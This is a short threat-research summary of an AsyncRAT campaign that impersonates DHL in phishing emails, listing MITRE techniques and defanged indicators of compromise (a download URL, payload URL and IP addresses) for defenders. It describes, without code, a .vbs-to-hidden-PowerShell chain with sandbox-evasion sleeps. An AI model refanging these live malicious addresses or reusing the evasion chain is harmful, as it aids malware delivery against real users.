Threat Research

Technical Analysis of an AsyncRAT Attack Impersonating DHL

iocOne
Technical Analysis of an AsyncRAT Attack Impersonating DHL

This report aims to technically analyze an attack leveraging AsyncRAT, a remote access trojan (RAT), framed within a DHL phishing impersonation scenario. The document outlines the Indicators of Compromise (IoCs), tactics employed by the attacker, and offers recommendations to mitigate risks. Affected: DHL, organizations vulnerable to phishing attacks.

Keypoints :

  • AsyncRAT is used to establish remote access and persistence in compromised systems.
  • The attack uses phishing emails impersonating DHL to lure users into downloading malicious files.
  • The malicious link leads to a compressed file that contains a .vbs script.
  • The script connects to a remote server to download further content and hides its activities through PowerShell commands.
  • Indicators of Compromise (IoCs) associated with the attack are both identified and documented for remediation.
  • Recommendations include blocking suspicious IP addresses and implementing advanced email filtering solutions.

MITRE Techniques :

  • Malware (T1587.001): Utilization of AsyncRAT for remote access capabilities.
  • Phishing: Spearphishing Link (T1566.002): Delivery of a phishing email employing a DHL identity with a download link.
  • User Execution: Malicious File (T1204.002): User executed the malicious file upon being deceived.
  • Command and Scripting Interpreter: Visual Basic (T1059.005): Execution of the malicious .vbs script after download.
  • Command and Scripting Interpreter: PowerShell (T1059.001): Powershell invoked to execute additional commands for malware operation.
  • Modify Registry (T1112): The malware altered Windows registry entries to conceal its presence.
  • Hidden Window (T1564.003): Powershell script executed with hidden window style to avoid detection.
  • Evasion based on Time (T1497.003): Utilized ‘sleep’ commands to bypass virtualization/sandbox environments.
  • Query Registry (T1012): The malware queried registry keys during the attack.
  • Application Layer Protocol: Web Protocols (T1071.001): Employed HTTP requests for command and control communication.

Indicator of Compromise :

  • [URL] hxxps://files-accl[.]zohoexternal[.]com/public/workdrive-external/download/afgzzad5ae19b67e043c58f6c91e20d8edb2b?x-cli-msg=%7B%22linkId%22%3A%22a7YZIcvjEC5-Xk88i%22%2C%22isFileOwner%22%3Afalse%2C%22version%22%3A%221.0%22%7D
  • [IP Address] 144[.]91.79.54
  • [URL] hxxp://144[.]91.79.54/15012025
  • [IP Address] 45[.]74.19.10
  • [IP Address] 192[.]168.100.231

Full Story: https://medium.com/@alexandrecasa/an%C3%A1lisis-t%C3%A9cnico-de-un-ataque-asyncrat-suplantando-a-dhl-df4a6b2d9fbe?source=rss——malware-5

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint